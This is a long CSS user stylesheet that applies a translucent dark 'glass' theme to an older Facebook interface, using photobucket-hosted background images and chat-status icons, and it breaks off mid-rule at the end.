li.selected,.connect_widget_number_cloud,.placesMashCandidate:hover,.highlight,#bfb_option_list li a:hover {background: rgba(0,0,0,.5) !important;}\n\n.results .page,.calltoaction,.results li,.fbNubFlyout,.contextualBlind,.bfb_dialog,.bfb_image_preview,input.text,.fbChatSidebar,.jewelBox,.clickToTagMessage,.tagName,.ufb-tip-body,.flyoutContent,.fbTimelineMapFilterBar,.fbTimelineMapFilter,.fbPhotoStripTypeaheadForm,.groupsSlimBarTop,.pas,.contentBox,.fbMapCalloutMain, .pagesVoiceBar {background: rgba(10,10,10,.75) !important;}\n\n#pageNav .tinyman:hover a,#navHome:hover a,#pageNav .tinyman a[style*=\"cursor: progress\"],#navHome a[style*=\"cursor: progress\"],#home_filter_list,#home_sidebar,#contentWrapper,.LDialog,.dialog-body,.LDialog,.LJSDialog,.dialog-foot,.chat_input,#contentCol,#leftCol,.UIStandardFrame_Content,.red_box,.yellow_box,.uiWashLayoutOffsetContent,.uiOverlayContent,.bfb_post_action_container,.connect_widget_button_count_count,.shaded,.navIdentitySub,.jewelItemList li a:hover,.fbSidebarGripper div,.jewelCount,.uiBoxRed,.videoUnit,.lifeEventAddPhoto,.fbTimelineLogIntroMegaphone,.uiGamesLeaderboardItem,.pagesTimelineButtonPagelet .counter,#pagelet_timeline_profile_actions .counter,.newInterestListNavItem:hover,.ogSliderAnimPagerPrevContent,.ogSingleStoryStatus,.ogSliderAnimPagerNextContent,.-cx-PRIVATE-uiDialog__body,.jewelItemNew .messagesContent {background: rgba(10,10,10,.5) !important;}\n\n#home_stream,pre,.ufiItem,.odd,.uiBoxLightblue,.platform_dialog_bottom_bar,.uiBoxGray,.fbFeedbackPosts,.mall_divider_text,.uiWashLayoutGradientWash, #bfb_options_body,.UIMessageBoxStatus,.tip_content .highlight,.fbActivity, .auxlabel,.signup_bar_container,#wait_panel,.FBAttachmentStage,.sheet,.uiInfoTable .name,.HCContents,#devsiteHomeBody .content,.devsitePage .nav .content,#confirm_phone_frame,.fbTimelineCapsule .timelineUnitContainer,.timelineReportContainer,.aboveUnitContent,.aboutMePagelet,#pagelet_tab_content_friends,#fbProfilePlacesBorder,#pagelet_tab_content_notes,.externalShareUnit,.fbTimelineNavigationWrapper .detail,.tosPaneInfo,.navSubmenu:hover,#bfb_donate_pagelet > div,.better_fb_mini_message,.uiBoxWhite,.uiLoadingIndicatorAsync,.mleButton,.fbTimelineBoxCount,.navSubmenu:hover,.gradient,.profileBrowserGrid tr > td > div,.statsContainer,#admin_panel,.fbTimelineSection, .escapeHatch, .ogAggregationPanelContent, .-cx-PRIVATE-fbTimelineExternalShareUnit__root, .shareUnit a, .storyBox {background: rgba(20,20,20,.4) !important;}\n\n.feed_comments,.home_status_editor,#rooster_container,.rooster_story,.UIFullPage_Container,.UIRoundedBox_Box,.UIRoundedBox_Side,.wallpost,.profile_name_and_status,.tabs_wrapper,.story,#feedwall_controls,.composer_well,.status_composer,.home_main_item,.feed_item,.HomeTabs_tab,#feed_content_section_applications li,.menu_separator,a[href=\"/friends\"],.feed_options_link,.show_all_link,.status,#newsfeed_submenu,.morecontent_toggle_link,.more_link,.composer_tabs,.bl,.profile_tab,.story_posted_item,.left_column,.pager_next,.admarket_ad,.box,.inside,.shade_b,.who_can_tab,.summary_simple,.footer_submit_rounded,.well_content,.info_section,.item_content,.basic_info_summary_and_viewer_actions dt,.info dt,.photo_table,.extra_content,.main_content,.search_inputs,.search_results,.result,.bar,.smalllinks span,.quiz_actionbox,.column,.note_header,.fdh,#fpgc,#fpgc td,.fmp,.fadvfilt,.fsummary,.frn,.two_column_wrapper,#new_ff,.see_more,.message_rows,.message_rows tr,.toggle_tabs li,.toggle_tabs li a,.notifications,.updates_all,.composer,.WelcomePage_MainSellContainer,.WelcomePage_MainSell,.media_gray_bg,.photo_comments_container,.photo_comments_main,.empty_message,.UIMediaHeader_Title,.UIMediaHeader_SubHeader,.footer_bar,.single_photo_header,#editphotoalbum,.covercheck,#newalbum,.panel,.album,.dh_titlebar,.page_content,.dashboard_header,.photos_header,.privacy_summary_items,.privacy_summary_item,.block_overview,.privacy_page_field,.editor_panel,.block,.action_box,.even_column,.mobile_account_inlay,.language,.confirm_boxes,.confirm,.status_confirm,.hasnt_app,.container, .UIDashboardHeader_TitleBar,.UIDashboardHeader_Container,.note,.UITwoColumnLayout_Container,.dialog_body,.dialog_buttons,.group_lists,.group_lists th,.group_list,.updates,.share_section,#profilenarrowcolumn,#profilewidecolumn,#inline_wall_post,.post_link_bar,.helppro_content,.answers_list_header,#help_titlebar,.new_user_guide,.new_user_guide_content,.flag_nav_item,.flag_nav_item a,.arrowlink a,#safety_page,#safety_page h5,.dashbar,.disclaimer,#store_options,#store_window,.step,.canvas_rel_positioning, .app_type a,.sub_selected a,.box_head,.inside_the_box,.app_about,.fallback,.box_subhead,.fbpage_card,#devsite_menubar,.content_sidebar,.side, .pBody li a,#p-logo,#p-navigation,#p-navigation .pBody,#bodyContent h1,#p-wiki,#p-wiki .pBody,#p-search,#p-search .pBody,#p-tb,#p-tb .pBody,#bodyContent table,#bodyContent table div,.recent_news,.main_news,.news_header, .devsite_subtabs li a,.middle-container,.feed_msg h4,.ads_info,.contact_sales,.wrapper h3,.presence_bar_button:hover,.icon_garden_elem:hover,#profile_minifeed,.focused,.dialog_summary,.tab span,.wallkit_postcontent h4,.address,#badges,.badge_holder,.aim_link,.user_status,.section_editor,.my_numbers,.photo_editor,.gift_rows,.sub_menu,.main-nav-tabs li a,.submenu_header,.new_gift,#profile_footer_actions,#status_bar,#summaryandpager,.userlist,#feedBody,#feedHeaderContainer,#feedContent,.feedBackground,.mixer_panel,.titles,.sliders,.slider_holder,.fbpage_title,.options,#linkeditorform,.sideNavItem .item,.typeahead_list_with_shadow,.module,.tc,.bc,.footer, .answer,.announcement,.basic_info_content,.slot,.boardkit_no_topics,.ranked_friend,.boardkit_subtitle,.filter-tabs,.level,.level_summary,.cause, .attachment_stage,.attachment_stage_area,.beneficiary_info,#info_tab,#feedwall_with_composer,.frni,.frni a,.flistedit,.fmp_delete,#feed_content_section_friend_lists li,.composer_tabs li:not(.selected),.menu_content li a,.view_on,.rounded-box,.ffriend,.tab_content,.wrapper_background,.full_container,.white_box,#friends li a,#inline_composer,.skin_body,.invite_tab_selected,.inside table,.matches_matches_box,.matches_content_box_subtitle,tr[fbcontext=\"41097bfeb58d\"],.dialog_body div div,.new_menu_off,.present_info_label,.import_status,.upload_guidelines,.tagger_border,.chat_info,.chat_conv_content,.chat_conv,.visibility_change,.pic_padding,.chat_notice,.chat_input_div,.wrapper,.toolbar_button,.toolbar_button_label,.pages_dashboard_panel,.no_pages,.divider,#filterview,#groupslist,.grouprow,.grouprow table,.board_topic,#big_search,#invitation_list,#invitation_wrapper,.emails_error, .outer_box,.inner_box,.days_remaining,.module,.submodule,.ntab,.ntab .tab_link,.grayheader,.inline_wall_post,.related_box,.home_box_wrapper,.two_column,.challenge_stats,.quiz_box, #fb_challenge,#fb_challenge_page,.challenge_leaderboard,.leaderboard_tile, .sidebar_upsell,.concerts_module,.container_box,#login_homepage,.user_hatch_bg,.pick_main,#homepage,.wall_post_body,.track,.HomeTabs_tab a,.minifeed,.alert_wrap,.logged_in_vertical_alert,.info_column,#public_listing_friends,#public_listing_pages,.gamertag_app,.gamerProfileBody,#photo_picker,.album_picker .page0 .row,.dialog_loading,.timeline,.partyrow,.partyrow table,#invite_list li,.group_info_section,#moveable_wide,.UIProfileBox_Content,.story_content,.settings_panel,.app_browser li,.photos_tab,.recent_notes,.side_note,.album_information,.results,.logged_out_register_vertical,.logged_out_register_wrapper,.deleted,.home_prefs_saved,.share_send,.header_divide,.thread_header,.message,.status_composer_inner,.fbpage_edit_header,.app_switcher_unselected,.status_placeholder,.UIComposer_TDTextArea, .UIHomeBox_Content,.UIHotStory,.home_welcome,.summary_custom,.source_list,.minor_section,.UIComposer_Attachment_TDTextArea,.info_diff span,.matches span,.menu_content,.UIcomposer_Dropdown_List,.UIComposer_Dropdown_Item,.feed_auto_update_settings,.container,.silver_footer,.friend_grid_col,.token > span,.tokenizer_input,.tokenizer_input *,#friends_multiselect,.flink_inner a:hover,#grouptypes,#startagroup p,.UICheckList,.FriendAddingTool_InnerMenu,.pagerpro li a:hover,#friend_filters,.fb_menu_count_holder,.hp_box,.view_all_link,.app_settings_tab,.tab_link,#flm_add_title,#flm_current_title,#flm_list_selector .selector,#friends_header,#friends_wrapper,.contacts_header,.contacts_wrapper,.row1,.show_advanced_controls,.FriendAddingTool_InnerMenu,.UISelectList,.UISelectList_Item,.UIIntentionalStory_CollapsedStories,.email_section,.section_header_bg,.rqbox,.ar_highlight,#buddy_list_panel,.panel_item,.friendlist_status,.options_actions a span,.chat_setting label,.toolbox,.chat_actions,.UIWell,.UIComposer_InputArea,.invite_panel,.apinote,.UIInterstitialBox_Container,.ical_section,.maps_brand,.divbox4,.lighteryellow,.fan_status_inactive,.UIBeeperCap,.footer_fallback_box,.footer_refine_search_company_school_box,.footer_refine_search_email_box,.UINestedFilterList_List,.UINestedFilterList_SubItem,.UINestedFilterList_Item_Link,.UINestedFilterList_Item_Link,.UINestedFilterList_SubItem_Link,.app_dir_app_summary,.app_dir_featured_app_summary,.app_dir_app_wide_summary,.profile_top_bar_container,.UIStream_Border,.question_container,.unselected_list label:nth-child(odd),.request_box,.showcase,.steps li,#fb_sell_profile div,.promotion,.UIOneOff_Container tabs,.whocan,.lock_r,.privacy_edit_link,.friend_list_container li:hover a,.email_field,.app_custom_content,#page,.thumb,.step_frame,.radioset,.radio_option,.page_option,.explanation_note,.card,.empty_albums,.right_column,.full_widget,.connect_top,.creative_preview,.creative_column,.UIAdmgrCreativePreview,.UIEMUASFrame,.banner_wrapper,.dashboard,.pages,#photocrop_instructions,.UIContentBox_GrayDarkTop,.UIContentBox_Gray,.UIContentBox,#FriendsPage_ListingViewContainer,.post_editor,.entry,.fb_dashboard,.spacey_footer,.thread,.post,.UIWashFrame_Content,table[bindpoint=\"thread_row\"],table[bindpoint=\"thread_row\"] tbody,.GBThreadMessageRow,.message_pane,.UIComposer_ButtonArea, .UIRoundedTransparentBox_Border,.feedbackView,.group,.streamPaginator,.nullStatePane,.inboxControls,.filterControls,.inboxView tr,.tabView,.tabView li a,.splitViewContent,.photoGrid,.albumGrid,.frame .img,.gridViewCrop,.gridView,.profileWall form,.story form,.formView,.inboxCompose,.LTokenizerToken,#icon_garden,#buddy_list_tab,#presence_notifications_tab,#editphotoalbum .photo,.UISuggestionList_SubContainer,.fan_action,.video_pane,.notify_option, .video_gallery,.video,.uiTooltip:not(.close):hover,.people_table,.people_table table,#main,#navlist li a.inactive,#rbar,.plays_bar,#fans,.updates_messages,.sent_updates_container,.subitem,#pagelet_navigation,.fbxWelcomeBox,.friends_online_sidebar,.uiTextHighlight,.tab_box,.bordered_list_item,.SettingsPage_PrivacySections,.profile-pagelet-section,.profileInfoSection,#pts_invite_section,.main_body,.masterControl,.masterControl .main,.linkbox,.uiTypeaheadView .search li,.language_form,#ads_privacy_examples,.fbPrivacyPage,.UIStandardFrame_SidebarAds,#sidebar_ads,#globalWrapper #content,.portlet,.pBody,.noarticletext,#catlinksm,.devsiteHeader,.devsiteFooter,.devsiteContent,.blockpost,.blockpost #topic,.blockpost .postleft,.blockpost .postfootleft,.fbRecommendation,.fbRecommendationWidgetContent,.add_comment,.connect_comment_widget .comment_content,.error,.even,.fbFeedbackPager,.uiComposerMessageBox,.facepileHolder,.notePermalinkMaincol,.profilePreviewHeader,.pageAttachment,.editExperienceForm,.tourSteplist,.tourSteplist ol,.uiStep,.uiStep:not(.uiStepSelected) .part, .uiStepSelected .part:not(.middle),.better_fb_cp,legend,.bfb_option_body div,.messaging_nux_header,.fbInsightsTable .odd td,.user.selected,.highlighter div b,.fbQuestionsBlingBox:hover,.friend_list_container,.jewelItemList li a:active,#bfb_tip_pagelet > div,.UIUpcoming_Item,.video_with_comments,.video_info,.fbFeedTickerStory,.fbFeedTicker.fixed_elem,.fbxPhoto .fbPhotoImageStage .stageContainer,#DeveloperAppBody > .content,.opengraph .preview,.coverNoImage,.fbTimelineScrubber,.fbTimelineAds,.fbProfilePlacesFilter,.fbFeedbackPost .UIImageBlock_Content,.permissionsViewEducation,.UIFaq_Container,#wizard,.captionArea,#bfb_options_content .option,.bfb_tab_selector,.UIMessageBoxExplanation,.uiStreamSubstories {background: rgba(20,20,20,.2) !important;}\n\n.uiSelector .uiSelectorButton,.UIRoundedBox_Corner,.quote,.em,.UIRoundedBox_TL,.UIRoundedBox_TR,.UIRoundedBox_BR,.UIRoundedBox_LS,.UIRoundedBox_BL,.profile_color_bar,.pagefooter_topborder,.menu_content,h3,#feed_content_section_friend_lists,ul,li[class=\"\"],.comment_box,.comment,#homepage_bookmarks_show_more,.profile_top_wash,.canvas_container,.composer_rounded,.composer_well,.composer_tab_arrow,.composer_tab_rounded,.tl,.tr,.module_right_line_block,.body,.module_bottom_line,.lock_b_bottom_line,#info_section_info_2530096808 .info dt,.pipe,.dh_new_media,.dh_new_media .br,.frn_inpad,#frn_lists,#frni_0,.frecent span,h3 span,.UIMediaHeader_TitleWash,.editor_panel .right,.UIMediaButton_Container tbody *,#userprofile,.profile_box,.date_divider span,.corner,.profile #content .UIOneOff_Container,.ff3,.photo #nonfooter #page_height,.home #nonfooter #page_height,.home .UIFullPage_Container,.main-nav,.generic_dialog,#fb_multi_friend_selector_wrapper,#fb_multi_friend_selector,.tab span,.tabs,.pixelated,.disabled,.title_header .basic_header,#profile_tabs li,#tab_content,.inside td,.match_link span,tr[fbcontext=\"41097bfeb58d\"] table,.accent,#tags h2,.read_updates,.user_input,.home_corner,.home_side,.br,.share_and_hide,.recruit_action,.share_buttons,.input_wrapper,.status_field,.UIFilterList_ItemRight,.link_btn_style span,.UICheckList_Label,#flm_list_selector .Tabset_selected .arrow,#flm_list_selector .selector .arrow .sel_link,.friendlist_status .title a,.online_status_container,.list_drop_zone_inner,.good_username,.WelcomePage_Container,.UIComposer_ShareButton *,.UISelectList_Label,.UIComposer_InputShadow .UIComposer_TextArea,.UIMediaHeader_TitleWrapper,.boxtopcool_hg,.boxtopcool_trg,.boxtopcool_hd,.boxtopcool_trd,.boxtopcool_bd,.boxtopcool_bg,.boxtopcool_b,#confirm_button,.title_text,#advanced_friends_1,.fb_menu_item_link,.fb_menu_item_link small,.white_hover,.GBTabset_Pill span,.UINestedFilterList_ItemRight,.GBSearchBox_Input input,.inline_edit,.feedbackView .comment th div,.searchroot,.composerView th div,.reply th div,.LTokenizer,.Mentions_Input,form.comment div,.ufi_section,.BubbleCount,.BubbleCount_Right,.UIStory,.object_browser_pager_more,.friendlist_name,.friendlist_name a,.switch,#tagger,.tagger_border,.uiTooltip,#reorder_fl_alert,.UIBeeper_Full,#navSearch,#navAccount,#navAccountPic,#navAccountName,#navAccountInfo,#navAccountLink,#mailBoxItems,#pagelet_chat_home h4,.buddy_row,.home_no_stories,#xpageNav li .navSubmenu,.uiListItem:not(.ufiItem),.uiBubbleCount,.number,.fbChatBuddylistPanel,.wash,.settings_screenshot,.privacyPlan .uiListItem:hover,.no_border,.auxiliary .highlight,.emu_comments_box_nub,.numberContainer,.uiBlingBox,.uiBlingBox:hover span,.callout_buttons,.uiWashLayoutEmptyGradientWash,.inputContainer,.editNoteWrapperInput,.fbTextEditorToolbar,.logoutButton input,#contentArea .uiHeader + .uiBoxGray,.uiTokenizer,#bfb_tabs,.profilePictureNuxHighlight,.profile-picture,#ci_module_list,.textBoxContainer,#date_form .uiButton,.insightsDateRange,.MessagingReadHeader,.groupProfileHeaderWash,.questionSectionLabel,.metaInfoContainer,.uiStepList ol,.friend_list,.fbFeedbackMentions,.bb .fbNubFlyoutHeader,.bb .fbNubFlyoutFooter,.fbNubFlyoutInner .fbNubFlyoutFooter,.gradientTop,.gradientBottom,.helpPage,.fbEigenpollTypeahead .plus,.uiSearchInput,.opengraph,#developerAppDetailsContent,.timelineLayout #contentCol,.attachmentLifeEvents,.fbProfilePlacesFilterBar,.uiStreamHeader,.uiStreamHeaderChronologicalForm,.inner .text,.pageNotifPopup,.uiButtonGroup,.navSubmenuPageLink,.fbTimelineTimePeriod,.bornUnit,.mleFooter,#bfb_filter_add_row,#bfb_options .option .no_hover,.fbTimelinePhotosSeparator h4 span,.withsubsections,.showMore,.event_profile_information tr:hover,.nux_highlight_nub,.uiSideNav .uiCloseButton,.uiSideNav .uiCloseButton input,.fb_content,.uiComposerAttachment .selected .attachmentName,.fbHubsTokenizer,.coverEmptyWrap,.uiStreamHeaderText,.pagesTimelineButtonPagelet,.fbNubFlyoutBody,#pageNav .tinyman:hover,#navHome:hover,.fbRemindersThickline,.uiStreamEdgeStoryLine hr,.uiInfoTable tbody tr:hover,.fbTimelineUFI,#contentArea,.leftPageHead,.rightPageHead,.anchorUnit,#pageNav .topNavLink a:focus,.timeline_page_inbox_bar,.uiStreamEdgeStoryLineTx,.pluginRecommendationsBarButton,.pluginRecommendationsBarTop table, .uiToken, .ogAggregationPanelText, .UFIRow {background: transparent !important;}\n\n.UIObject_SelectedItem,.sidebar_item_header,.announcement_title,#pagefooter,.selected:not(.key-messages):not(.key-events):not(.key-media):not(.key-ff):not(.page):not(.group):not(.user):not(.app),.date_divider_label,.profile_action,.blurb ,.tabs_more_menu,.more a span,.selected h2,.column h2,.ffriends,.make_new_list_button_table tr,.title_header,.inbox_menu,.side_column,.section_header h3 span,.media_header,#album_container,.note_dialog,.dialog,.has_app,.UIMediaButton_Container,.dialog_title,.dialog_content,#mobile_notes_announcement,.see_all,#profileActions,.fbpage_group_title,.UIProfileBox_SubHeader,#profileFooter,.share_header,#share_button_dialog,.flag_nav_item_selected,.new_user_guide_content h2,#safety_page h4,.section_banner,.box_head,#header_bar,.content_sidebar h3,.content_header,#events h3,#blog h3,.footer_border_bottom,.firstHeading,#footer,.recent_news h3,.wrapper div h2,.UIProfileBox_Header,.box_header,.bdaycal_month_section,#feedTitle,.pop_content,#linkeditor,.UIMarketingBox_Box,.utility_menu a,.typeahead_list,.typeahead_suggestions,.typeahead_suggestion,.fb_dashboard_menu,.green_promotion,.module h2,.current_path,.boardkit_title,.current,.see_all2,.plain,.share_post,.add-link,li.selected,.active_list a,#photoactions a:not(#rotaterightlink):not(#rotateleftlink),.UIPhotoTagList_Header,.dropdown_menu,.menu_content,.menu_content li a:hover,.menu_content li:hover,#edit_profilepicture,.menu_content div a:hover,.contact_email_pending,.req_preview_guts,.inputbutton,.inputsubmit,.activation_actions_box,.wall_content,.matches_content_box_title,.new_menu_selected,#editnotes_content,#file_browser,.chat_window_wrapper,.chat_window,.chat_header,.hover,.dc_tabs a,.post_header,.header_cell,#error,.filters,.pages_dashboard_panel h2,.srch_landing h2,.bottom_tray,.next_action,.pl-divider-container,.sponsored_story,.header_current,.discover_concerts_box,.header,.sidebar_upsell_header,.activity_title h2,.wall_post_title,#maps_options_menu,.menu_link,.gamerProfileTitleBar,.feed_rooster ,.emails_success,.friendTable table:hover,.board_topic:hover,.fan_table table:hover,#partylist .partyrow:hover,.latest_video:hover,.wallpost:hover,.profileTable tr:hover,.friend_grid_col:hover,.bookmarks_list li:hover,.requests_list li:hover,.birthday_list li:hover,.tabs li,.fb_song:hover,.share_list .item_container:hover,.written a:hover,#photos_box .album:hover,.people .row .person:hover,.group_list .group:hover,.confirm_boxes .confirm:hover,.posted .share_item_wide .share_media:hover,.note:hover,.editapps_list .app_row:hover,.my_networks .blocks .block:hover,.mock_h4,#notification_options tr:hover,.notifications_settings li:hover,.mobile_account_main h2,.language h4,.products_listing .product:hover,.info .item .item_content:hover,.info_section:hover,.recent_notes p:hover,.side_note:hover,.suggestion,.story:hover,.post_data:hover,.album_row:hover,.track:hover,#pageheader,.message:hover,input[type=\"submit\"]:not(.fg_action_hide):not(.stat_elem):not([name=\"add\"]):not([name=\"actions[reject]\"]):not([name=\"actions[accept]\"]):not([value=\"Find Friends\"]):not([value=\"Share\"]):not([value=\"Maybe\"]):not([value=\"No\"]):not([value=\"Yes\"]):not([value=\"Comment\"]):not([value=\"Reply\"]):not([value=\"Flag\"]):not([type=\"submit\"]),.UITabGrid_Link:hover,.UIActionButton,.UIActionButton_Link,.confirm_button,.silver_dashboard,span.button,.col:hover,#photo_tag_selector,#pts_userlist,.flink_dropdown,.flink_inner,.grouprow:hover,#findagroup h4,#startagroup h4,.actionspro a:hover,.UIActionMenu_Menu,.UICheckList_Label:hover,.make_new_list_button_table,.contextual_dialog_content,#flm_list_selector .selector:hover,.show_advanced_controls:hover,.UISelectList_check_Checked,.section_header,.section_header_bg,#buddy_list_panel_settings_flyout,.options_actions,.chat_setting,.flyout,.flyout .UISelectList,.flyout .new_list,#tagging_instructions,.FriendsPage_MenuContainer,.UIActionMenu,.UIObjectListing:hover,.UIStory_Hide .UIActionMenu_Wrap,.UIBeeper,.branch_notice,.async_saving,.UIActionMenu .UIActionMenu_Wrap:hover,.attachment_link a:hover,.UITitledBox_Top,.UIBeep,.Beeps,#friends li a:hover,.apinote h2,.UIActionButton_Text,.rsvp_option:hover,.onglettrhi,.ongletghi,.ongletdhi,.ongletg,.onglettr,.ongletd,.confirm_block, .unfollow_message,.UINestedFilterList_SubItem_Selected .UINestedFilterList_SubItem_Link,.UINestedFilterList_SubItem_Link:hover,.UINestedFilterList_Item_Link:hover,.UINestedFilterList_Selected .UINestedFilterList_Item_Link,.app_dir_app_summary:hover,.app_dir_featured_app_summary:hover,.app_dir_app_wide_summary:hover,.UIStory:hover,.UIPortrait_TALL:hover,.UIActionMenu_Menu div,.UIButton_Blue,.UIButton_Gray,.quiz_cell:hover,.UIFilterList > .UIFilterList_Title,.message_rows tr:hover,.ntab:hover,.thumb_selected,.thumb:hover,.hovered a,.pandemic_bar,.promote_page,.promote_page a,.create_button a,.nux_highlight,.UIActionMenu_Wrap,.share_button_browser div,.silver_create_button,.painted_button,.flyer_button,table[bindpoint=\"thread_row\"] tbody tr:hover,.GBThreadMessageRow:hover,#header,.button:not(.close):not(.uiSelectorButton):not(.videoicon):not(.toggle),h4,button:not(.as_link),#navigation a:hover,.settingsPaneIcon:hover,a.current,.inboxView tr:hover,.tabView li a:hover,.friendListView li:hover,.LTypeaheadResults,.LTypeaheadResults a:hover,.dialog-title, .UISuggestionList_SubContainer:hover,.typeahead_message,.progress_bar_inner,.video:hover,.advanced_controls_link,.plays_val,.lightblue_box,.FriendAddingTool_InnerMenu .UISelectList,.gray_box,.uiButton:not(.uiSelectorButton),.fbPrivacyWidget .uiSelectorButton:not(.lockButton),.uiButtonSuppressed,#navAccount li:not(#navAccountInfo),.jewelHeader,.seeMore,#mailBoxItems li,#pageFooter,.uiSideNav .key-nf:hover,.key-messages .item:hover,.key-messages ul li:hover,.key-events ul li:hover,.key-media ul li:hover,.key-ff ul li:hover,.key-apps:hover,.key-games:hover,.uiSideNav .sideNavItem:not(.open) .item:hover,.fbChatOrderedList .item:hover a,.uiHeader,.uiListItem:not(.mall_divider):hover,.uiSideNav li.selected > a,.ego_unit:hover,.results,.bordered_list_item:hover,.fbConnectWidgetFooter,#viewas_header,.fbNubFlyoutTitlebar,.info_text,.stage,.masterControl .selected a,.masterControl .controls .item a:hover,.uiTypeaheadView .search,.gigaboxx_thread_hidden_messages,.uiMenu,.uiMenuInner,.itemAnchor,.gigaboxx_thread_branch_message,.uiSideNavCount,.uiBoxYellow,.loggedout_menubar_container,.pbm .uiComposer,.megaphone_box,.uiCenteredMorePager,.fbEditProfileViewExperience:hover,.uiStepSelected .middle,.GM_options_header,.bfb_tab_selected, #MessagingShelfContent,.connect_widget_like_button,.uiSideNav .open,.fbActivity:hover,.fbQuestionsPollResultsBar,.insightsDateRangeCustom,.fbInsightsTable thead th,.mall_divider,.attachmentContent .fbTabGridItem:hover,.jewelItemNew,#MessagingThreadlist .unread,.type_selected,.bfb_sticky_note,.UIUpcoming_Item:hover,.progress_bar_outer,.fbChatBuddyListDropdown .uiButton,.UIConnectControlsListSelector .uiButton,.instructions,.uiComposerMetaContainer,.uiMetaComposerMessageBoxShelf,#feed_nux,#tickerNuxStoryDiv,.fbFeedTickerStory:hover,.fbCurrentStory:hover,.uiStream .uiStreamHeaderTall,.fbChatSidebarMessage,.fbPhotoSnowboxInfo,.devsitePage .menu,.devsitePage .menu .content,#devsiteHomeBody .wikiPanel > div,.toolbarContentContainer,.fbTimelineUnitActor,#fbTimelineHeadline,.fbTimelineNavigation,.fbTimelineFeedbackActions,.timelineReportHeader,.fbTimelineCapsule .timelineUnitContainer:hover,.timelineReportContainer:hover,.fbTimelineComposerAttachments .uiListItem:hover span a,.timelinePublishedToolbar,.timelineRecentActivityLabel,.fbTimelineMoreButton,.overlayTitle,.friendsBoxHeader,.escapeHatchHeader,.tickerStoryAllowClick,.appInvite:hover,.fbRemindersStory:hover,.lifeEventAddPhoto a:hover,.insights-header,.ufb-dataTable-header-container,.ufb-button,.older-posts-content,.mleButton:hover,.btnLink,.fill,.cropMessage,.adminPanelList li:hover a,.tlPageRecentOverlayStream,.addListPageMegaphone,.searchListsBox,.ogStaticPagerHeader,.dialogTitle,#rogerSidenavCallout,.fbTimelineAggregatedMapUnitSeeAll,.shareRedesignContainer,.ogSingleStoryText,.ogSliderAnimPagerPrevWrapper,.ogSliderAnimPagerNextWrapper,.shareRedesignText,.pluginRecommendationsBarTop,.timelineRecentActivityStory:hover, .ogAggregationPanelUFI\n{ background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Wallpaper/GlassShiny.png\") fixed repeat !important;}\n\n.hovercard .stage,.profileChip,.GM_options_wrapper_inner,.MessagingReadHeader .uiHeader,#MessagingShelf,#navAccount ul,.uiTypeaheadView,#blueBar,.uiFacepileItem .uiTooltipWrap,.fbJewelFlyout,.jewelItemList li,.notification:not(.jewelItemNew),.fbNubButton,.fbChatTourCallout .body,.uiContextualDialogContent,.fbTimelineStickyHeader .back,.timelineExpandLabel:hover,.pageNotifFooter a,.fbSettingsListLink:hover,.uiOverlayPageContent,#bfb_option_list,.fbPhotoSnowlift .rhc,.ufb-tip-title,.balloon-content,.tlPageRecentOverlayTitle,.uiDialog,.uiDialogForm,.permissionsLockText, .uiMenuXBorder,.-cx-PRIVATE-uiDialog__content,.-cx-PRIVATE-uiDialog__title, ._k5\n{ background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Wallpaper/GlassShiny.png\") fixed repeat, rgba(10,10,10,.6) !important; }\n\n.unread .badge,.fbDockChatBuddyListNub .icon,.sx_7173a9,.selectedCheckable .checkmark {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/blueball15.png\") no-repeat right center!important;}\n\ntable[class=\" \"] .badge:hover,table[class=\"\"] .badge:hover,.offline .fbDockChatBuddyListNub .icon,.fbChatSidebar.offline .fbChatSidebarMessage .img {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/grayball15.png\") no-repeat right center!important;}\n\n.fbChatSidebar.offline .fbChatSidebarMessage .img {height: 16px !important;}\n\n.offline .fbDockChatBuddyListNub .icon,.fbDockChatBuddyListNub .icon,.sx_7173a9 {margin-top: 0 !important;height: 15px !important;}\n\na.idle,.buddyRow.idle .buddyBlock,.fbChatTab.idle .tab_availability,.fbChatTab.disabled .tab_availability,.chatIdle .chatStatus,.idle .fbChatUserTab .wrap,.chatIdle .uiTooltipText,.markunread,.bb .fbDockChatTab.user.idle .titlebarTextWrapper,.fbChatOrderedList .item:not(.active) .status {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/grayball10paddedright.png\") no-repeat left center !important;}\n\n.fbChatOrderedList .item .status {width: 10px !important;}\n\n.headerTinymanName {max-width: 320px !important; white-space: nowrap !important; overflow: hidden !important;}\n\n.uiTooltipText {padding-left: 14px !important;border: none !important;}\n \n.fbNubButton,.bb .fbNubFlyoutTitlebar,.bb .fbNub .noTitlebar,.fbDockChatTab,#fbDockChatBuddylistNub .fbNubFlyout,.fbDockChatTabFlyout,.titlebar {border-radius: 8px 8px 0 0!important;}\n\n.uiSideNav .open {padding-right: 0 !important;}\n.uiSideNav .open,.uiSideNav .open > *,#home_stream > *,.bb .rNubContainer .fbNub,.fbChatTab {margin-left: 0 !important;}\n.uiSideNav .open ul > * {margin-left: -20px !important;}\n.uiSideNav .open .subitem > .rfloat {margin-right: 20px !important;}\n\n.timelineUnitContainer .timelineAudienceSelector .uiSelectorButton {padding: 1px !important; margin: 4px 0 0 4px !important;}\n.timelineUnitContainer .audienceSelector .uiButtonNoText .customimg {margin: 2px !important;}\n.timelineUnitContainer .composerAudienceSelector .customimg {opacity: 1 !important; background-position: 0 1px !important; padding: 0 !important;}\n\n.fbNub.user:not(.disabled) .wrap {padding-left: 15px !important;}\n.fbNubFlyoutTitlebar .titlebarText {padding-left: 12px !important;}\n\na.friend:not(.idle),.buddyRow:not(.idle) .buddyBlock,.fbChatTab:not(.idle):not(.disabled) .tab_availability,.chatOnline .chatStatus,.markread,.user:not(.idle):not(.disabled) .fbChatUserTab .wrap,.chatOnline .uiTooltipText,.bb .fbDockChatTab.user:not(.idle):not(.disabled) .titlebarTextWrapper,.fbChatOrderedList .item.active .status,.active .titlebarTextWrapper,.uiMenu .checked .itemAnchor {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/blueball10paddedright.png\") no-repeat !important;}\n\na.friend:not(.idle),.buddyRow:not(.idle) .buddyBlock,.fbChatTab:not(.idle):not(.disabled) .tab_availability,.chatOnline .chatStatus,.markread,a.idle,.buddyRow.idle .buddyBlock {background-position: right center !important;}\n\n.user:not(.idle):not(.disabled) .fbChatUserTab .wrap,.chatOnline .uiTooltipText,.bb 